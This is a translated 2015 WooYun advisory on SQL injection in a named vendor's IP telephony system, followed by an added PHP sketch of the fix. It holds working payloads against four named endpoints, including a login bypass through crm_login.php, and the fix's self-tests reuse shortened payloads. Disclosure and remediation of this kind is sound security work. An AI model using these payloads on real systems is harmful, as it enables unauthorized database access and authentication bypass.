Vulnerability summary

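Bug ID: wooyun-2015-0120245

Title: Several SQL injection vulnerabilities in the 耐通科技 IP telephony system

Vendor: 耐通科技

Author: 路人甲

Submitted: 2015-06-15 17:30

Fixed: 2015-07-30 17:32

Disclosed: 2015-07-30 17:32

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]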


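Vulnerability details

Disclosure status:

2015-06-15: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-07-30: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Several SQL injection vulnerabilities in the 耐通科技 IP telephony system

Detailed description:

Several SQL injection vulnerabilities in the 耐通科技 IP telephony system
Example cases: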


Vulnerability details:

1.
/transfer.php?action=getIVRFail&randomid=1434181126622&channel=1') UNION ALL SELECT CONCAT(0x3A403A,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3A403A)--%20
2.
/call-log.php?randomid=1434180084664&agent=1'||(SELECT 'abc' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
3.
/ipcc_record.php?randomid=1434181312237&agent=1') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('a'='a
4.
Login as an arbitrary user + boolean-based blind injection
POST /crm_login.php HTTP/1.1
agent_name=-1' or 1=1--%20&agent_pwd=20&Issoftphone=yes&submit=
POST /crm_login.php HTTP/1.1
agent_name=-1' or 1=2--%20&agent_pwd=20&Issoftphone=yes&submit=

Proof of vulnerability:

1. Screenshot: 1.png
2. Screenshot: 2.png
3. Screenshot: 3.png
4. Screenshots: 4-1.png, 4-2.png


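Fix:

Validate and filter the parameters, and restrict access by users who are not logged in

Copyright notice: when reposting, please credit the source 路人甲@乌云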
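The fix recommended in the report (validate parameters, require a login) can be sketched in PHP as follows. This is an added example, not part of the original report and not the vendor's code: it adds bound query parameters (prepared statements) to the reported advice, and the agents table, its columns, the digits-only rule for channel/agent, the function names and the use of in-memory SQLite in place of MySQL are all assumptions.

```php
<?php
declare(strict_types=1);
// Added illustration, not the vendor's code. The agents table, its columns and
// all function names are assumptions; in-memory SQLite stands in for MySQL.

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE agents (name TEXT PRIMARY KEY, pwd_hash TEXT NOT NULL)');
    // Constructed sample account.
    $db->prepare('INSERT INTO agents VALUES (?, ?)')
       ->execute(['1001', password_hash('sample-pw', PASSWORD_DEFAULT)]);
    return $db;
}

// Login check for a form like crm_login.php: agent_name is bound as data, so a
// quote or comment marker in it cannot alter the WHERE clause.
function login(PDO $db, string $name, string $pwd): bool {
    $st = $db->prepare('SELECT pwd_hash FROM agents WHERE name = ?');
    $st->execute([$name]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pwd, $hash);
}

// Allow-list check for identifier parameters (channel, agent): digits only.
// Assumes these identifiers are numeric, as in the requests shown in the report.
function valid_id($v): bool {
    return is_string($v) && preg_match('/\A[0-9]{1,10}\z/', $v) === 1;
}

// Gate for data pages: authenticated session first, then a well-formed parameter.
function guard(array $session, array $query, string $param): int {
    if (empty($session['agent'])) {
        return 401;
    }
    return valid_id($query[$param] ?? null) ? 200 : 400;
}

$db = make_db();
$badChannel = "1') UNION ALL SELECT 1-- ";   // shortened form of request 1
$checks = [
    'injected login rejected' => login($db, "-1' or 1=1-- ", '20') === false,
    'valid login accepted'    => login($db, '1001', 'sample-pw') === true,
    'no session gives 401'    => guard([], ['channel' => '1'], 'channel') === 401,
    'bad channel gives 400'   => guard(['agent' => '1001'], ['channel' => $badChannel], 'channel') === 400,
    'clean channel gives 200' => guard(['agent' => '1001'], ['channel' => '1'], 'channel') === 200,
];
foreach ($checks as $label => $ok) {
    echo ($ok ? 'ok   ' : 'FAIL ') . $label . PHP_EOL;
}
```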


Vulnerability response

Vendor response:

Could not reach the vendor, or the vendor actively refused

Vulnerability Rank: 15 (WooYun assessment)